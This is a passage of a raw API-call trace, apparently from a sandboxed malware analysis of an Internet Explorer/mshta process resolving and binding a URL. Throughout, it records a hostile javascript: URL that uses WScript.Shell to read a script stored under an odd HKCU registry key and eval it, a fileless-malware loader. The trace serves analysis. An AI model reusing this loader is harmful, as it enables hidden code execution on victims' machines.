rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, 
[7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec90 | out: ppv=0x18ec90*=0x75028d20) returned 0x0 [0066.637] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ed7c | out: ppvObject=0x18ed7c*=0x75028d2c) returned 0x0 [0066.637] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.638] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=17, dwParseFlags=0x0, pwzResult=0x63cfc8, cchResult=0x65, pcchResult=0x18edd4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18edd4*=0x0) returned 0x800c0011 [0066.638] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.638] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.638] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.638] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.638] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x2700, pPolicy=0x18f3c0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x18f3c0*=0x0) returned 0x0 [0066.638] IUnknown:Release (This=0x63be1c) returned 0x5 [0066.638] IUnknown:Release (This=0x63be1c) returned 0x4 [0066.638] IUnknown:AddRef (This=0x63be1c) returned 0x5 [0066.638] IUri:GetPropertyDWORD (in: This=0x63be1c, uriProp=0x11, pdwProperty=0x18f1f4, dwFlags=0x0 | out: pdwProperty=0x18f1f4*=0xf) returned 0x0 [0066.638] IInternetSecurityManager:GetSecurityId (in: This=0x643e78, pwszUrl="javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f250, pcbSecurityId=0x18f24c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f250*=0x6a, pcbSecurityId=0x18f24c*=0x68) returned 0x0 [0066.638] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f250, pcbSecurityId=0x18f24c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f250*=0x0, pcbSecurityId=0x18f24c*=0x200) returned 0x800c0011 [0066.638] IUnknown:Release (This=0x63be1c) returned 0x4 [0066.638] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.638] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x64fe88 [0066.639] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x18f474, dwReserved=0x0 | out: ppIInternetSession=0x18f474*=0x63ee70) returned 0x0 [0066.639] IInternetSession:RegisterNameSpace (This=0x63ee70, pCF=0x75028c50, rclsid=0x74c29790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.639] IUnknown:AddRef (This=0x75028c50) returned 0x1 [0066.639] IInternetSession:RegisterNameSpace (This=0x63ee70, pCF=0x75028c70, rclsid=0x74c29780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.640] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.640] StrCmpICW (pszStr1="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pszStr2="res://ieframe.dll/PhishSite.htm") returned -8 [0066.640] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f3e4 | out: ppvObject=0x18f3e4*=0x63c68c) returned 0x0 [0066.640] IUnknown:Release (This=0x63c68c) returned 0x9 [0066.640] 
IUnknown:AddRef (This=0x63c68c) returned 0xa [0066.640] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12c) returned 0x64fef8 [0066.640] IUnknown:AddRef (This=0x63c68c) returned 0xb [0066.640] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f3a8 | out: ppvObject=0x18f3a8*=0x63c68c) returned 0x0 [0066.640] IUnknown:Release (This=0x63c68c) returned 0xb [0066.640] IUnknown:AddRef (This=0x63c68c) returned 0xc [0066.640] IUnknown:Release (This=0x63c68c) returned 0xb [0066.640] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x624170 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x650030 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x62d788 [0066.641] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f42c | out: pdwScheme=0x18f42c*=0xf) returned 0x0 [0066.641] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f434 | out: ppvObject=0x18f434*=0x63c68c) returned 0x0 [0066.641] IUnknown:Release (This=0x63c68c) returned 0xb [0066.641] IUnknown:AddRef (This=0x63c68c) returned 0xc [0066.641] IUnknown:Release (This=0x63c68c) returned 0xb [0066.641] IUri:IsEqual (in: This=0x63be1c, pUri=0x63c68c, pfEqual=0x18f474 | out: pfEqual=0x18f474*=1) returned 0x0 [0066.641] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x650fc0 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6337a8 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x650270 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, 
Size=0x30) returned 0x62d7f8 [0066.642] PostMessageW (hWnd=0x202ac, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12c) returned 0x6502d8 [0066.642] IUnknown:AddRef (This=0x63c68c) returned 0xc [0066.642] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f3c8 | out: ppvObject=0x18f3c8*=0x63c68c) returned 0x0 [0066.642] IUnknown:Release (This=0x63c68c) returned 0xc [0066.642] IUnknown:AddRef (This=0x63c68c) returned 0xd [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651018 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x68) returned 0x650410 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x108) returned 0x650480 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f290 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xcc) returned 0x63d328 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x64f7f0 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d830 [0066.643] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1b0) returned 0x650590 [0066.643] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f0cc | out: ppvObject=0x18f0cc*=0x63c68c) returned 0x0 [0066.643] IUnknown:Release (This=0x63c68c) returned 0xd [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0xe [0066.643] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0xf [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0x10 [0066.643] IUnknown:QueryInterface (in: 
This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f0c0 | out: ppvObject=0x18f0c0*=0x63c68c) returned 0x0 [0066.643] IUnknown:Release (This=0x63c68c) returned 0x10 [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0x11 [0066.643] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x650698 | out: pdwScheme=0x650698*=0xf) returned 0x0 [0066.643] IMoniker:IsSystemMoniker (in: This=0x620638, pdwMksys=0x18f128 | out: pdwMksys=0x18f128*=0x6) returned 0x0 [0066.696] IUri:GetSchemeName (in: This=0x63c68c, pbstrSchemeName=0x18f080 | out: pbstrSchemeName=0x18f080*="javascript") returned 0x0 [0066.696] _wcsnicmp (_String1="javas", _String2="data", _MaxCount=0x5) returned 6 [0066.696] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f0cc | out: pdwScheme=0x18f0cc*=0xf) returned 0x0 [0066.696] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f08c | out: ppvObject=0x18f08c*=0x63c68c) returned 0x0 [0066.697] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.697] IUnknown:AddRef (This=0x63c68c) returned 0x12 [0066.697] CoInternetQueryInfo (in: pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", QueryOptions=0xd, dwQueryFlags=0x0, pvBuffer=0x18f0bc, cbBuffer=0x4, pcbBuffer=0x18f0b4, dwReserved=0x0 | out: pvBuffer=0x18f0bc*, pcbBuffer=0x18f0b4*=0x4) returned 0x0 [0066.698] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ef44 | out: ppv=0x18ef44*=0x75028d20) returned 0x0 
[0066.698] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f030 | out: ppvObject=0x18f030*=0x75028d2c) returned 0x0 [0066.698] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.747] CoInternetParseUrl (in: pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=0x13, dwFlags=0x0, pszResult=0x18cff0, cchResult=0x1000, pcchResult=0x18cfec, dwReserved=0x0 | out: pszResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18cfec) returned 0x0 [0066.747] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ce80 | out: ppv=0x18ce80*=0x75028d20) returned 0x0 [0066.747] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18cf6c | out: ppvObject=0x18cf6c*=0x75028d2c) returned 0x0 [0066.747] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.748] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=19, dwParseFlags=0x0, pwzResult=0x18cff0, cchResult=0x1000, pcchResult=0x18cfec, dwReserved=0x0 | out: pwzResult="a큜\x18䄎盞濎깧￾￿⋦盔⑆盔Ɯ", pcchResult=0x18cfec*=0x18cf8c) returned 0x800c0011 [0066.748] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.748] ParseURLW (in: pcszURL="javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18cfbc | out: ppu=0x18cfbc) returned 0x0 [0066.805] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.805] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.805] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f0cc | out: ppvObject=0x18f0cc*=0x63c68c) returned 0x0 [0066.805] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.805] IUnknown:AddRef (This=0x63c68c) returned 0x12 [0066.805] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651070 [0066.806] GetCurrentThreadId () returned 0x2a8 [0066.806] CreateBindCtx (in: reserved=0x0, ppbc=0x18f110 | out: ppbc=0x18f110*=0x64e618) returned 0x0 [0066.806] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc) returned 0x64f808 [0066.806] IUnknown:AddRef (This=0x64e618) returned 0x2 [0066.806] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x644d58 [0066.806] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eff4 | out: phkResult=0x18eff4*=0x198) returned 0x0 [0066.806] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eff8 | out: phkResult=0x18eff8*=0x12c) returned 0x0 [0066.807] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x18efb4 | out: phkResult=0x18efb4*=0x0) returned 0x2 [0066.807] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x18efb4 | out: phkResult=0x18efb4*=0x1a0) returned 0x0 [0066.807] SHRegGetValueW () returned 0x2 [0066.807] SHRegGetValueW () returned 0x2 [0066.807] RegCloseKey 
(hKey=0x1a0) returned 0x0 [0066.807] RegCloseKey (hKey=0x0) returned 0x6 [0066.807] RegCloseKey (hKey=0x0) returned 0x6 [0066.807] RegCloseKey (hKey=0x198) returned 0x0 [0066.807] RegCloseKey (hKey=0x12c) returned 0x0 [0066.807] RegisterBindStatusCallback (in: pBC=0x64e618, pBSCb=0x6505a0, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0066.807] IUnknown:AddRef (This=0x6505a0) returned 0x4 [0066.807] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f05c | out: ppvObject=0x18f05c*=0x6505a4) returned 0x0 [0066.808] IMoniker:RemoteBindToStorage (in: This=0x620638, pbc=0x64e618, pmkToLeft=0x0, riid=0x74c1f8b0, ppvObj=0x18f0a8 | out: ppvObj=0x18f0a8*=0x0) returned 0x401e8 [0066.808] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ebe0 | out: ppv=0x18ebe0*=0x75028d20) returned 0x0 [0066.808] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18eccc | out: ppvObject=0x18eccc*=0x75028d2c) returned 0x0 [0066.809] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.809] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6520a0, cchResult=0x824, pcchResult=0x18efe0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18efe0*=0x0) returned 0x800c0011 [0066.809] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.809] 
IUnknown:QueryInterface (in: This=0x6505a0, riid=0x7682ad24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x18ef70 | out: ppvObject=0x18ef70*=0x6505a0) returned 0x0 [0066.809] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x6505a0, grfBINDF=0x6520e4, pbindinfo=0x652194, pstgmed=0x6520e8, grfBINDF2=0x18efbc, pdwReserved=0x80004005 | out: grfBINDF=0x6520e4*=0x83, pbindinfo=0x652194, pstgmed=0x6520e8, grfBINDF2=0x18efbc*=0x0, pdwReserved=0x80004005) returned 0x0 [0066.809] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee90 | out: phkResult=0x18ee90*=0x12c) returned 0x0 [0066.809] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee94 | out: phkResult=0x18ee94*=0x198) returned 0x0 [0066.809] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee50 | out: phkResult=0x18ee50*=0x0) returned 0x2 [0066.810] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee50 | out: phkResult=0x18ee50*=0x0) returned 0x2 [0066.810] RegCloseKey (hKey=0x0) returned 0x6 [0066.810] RegCloseKey (hKey=0x0) returned 0x6 [0066.810] RegCloseKey (hKey=0x12c) returned 0x0 [0066.810] RegCloseKey (hKey=0x198) returned 0x0 [0066.810] IUnknown:Release (This=0x6505a0) returned 0x5 [0066.810] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef38 | out: ppvObject=0x18ef38*=0x0) returned 0x80004002 [0066.810] IServiceProvider:QueryService (in: This=0x6505a4, 
guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef38 | out: ppvObject=0x18ef38*=0x0) returned 0x80004002 [0066.810] GetCurrentThreadId () returned 0x2a8 [0066.810] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ee84 | out: ppv=0x18ee84*=0x75028d20) returned 0x0 [0066.811] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.812] IBindStatusCallback:OnStartBinding (This=0x6505a0, dwReserved=0xff, pib=0x6520a0) returned 0x0 [0066.812] IUnknown:AddRef (This=0x6520a0) returned 0x2 [0066.812] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.812] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ee48 | out: ppvObject=0x18ee48*=0x0) returned 0x80004002 [0066.812] IServiceProvider:QueryService (in: This=0x6505a4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ee48 | out: ppvObject=0x18ee48*=0x0) returned 0x80004002 [0066.813] GetCurrentThreadId () returned 0x2a8 [0066.813] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, 
[1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ee58 | out: ppv=0x18ee58*=0x75028d20) returned 0x0 [0066.813] IClassFactory:CreateInstance (in: This=0x75028d20, pUnkOuter=0x652208, riid=0x7681482c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x65222c | out: ppvObject=0x65222c*=0x652ab8) returned 0x0 [0066.862] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x98) returned 0x652ab8 [0066.862] IUnknown_QueryService (in: punk=0x652208, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvOut=0x18ee88 | out: ppvOut=0x18ee88*=0x643cd4) returned 0x0 [0066.862] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ed30 | out: ppvObject=0x18ed30*=0x0) returned 0x80004002 [0066.863] IServiceProvider:QueryService (in: This=0x6505a4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ed30 | out: ppvObject=0x18ed30*=0x643cd4) returned 0x0 [0066.863] GetCurrentThreadId () returned 0x2a8 [0066.933] IUnknown:QueryInterface (in: This=0x652ab8, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x652290 | out: ppvObject=0x652290*=0x652acc) returned 0x0 [0066.933] IUnknown:AddRef (This=0x652208) returned 0x7 [0066.933] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.933] IUnknown:Release (This=0x652acc) returned 0x6 [0066.933] IUnknown:Release (This=0x652208) returned 0x6 [0066.934] IUnknown:AddRef (This=0x652acc) returned 0x7 [0066.934] IUnknown:AddRef (This=0x652208) returned 0x7 [0066.934] IUnknown:Release (This=0x652acc) returned 0x6 [0066.934] IUnknown:Release (This=0x652208) returned 0x6 [0066.934] IUnknown:QueryInterface (in: This=0x652acc, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef34 | out: ppvObject=0x18ef34*=0x652218) returned 0x0 [0066.934] IUnknown:QueryInterface (in: This=0x652208, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef34 | out: ppvObject=0x18ef34*=0x652218) returned 0x0 [0066.934] IUnknown:QueryInterface (in: This=0x652ab8, riid=0x76826b00*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, 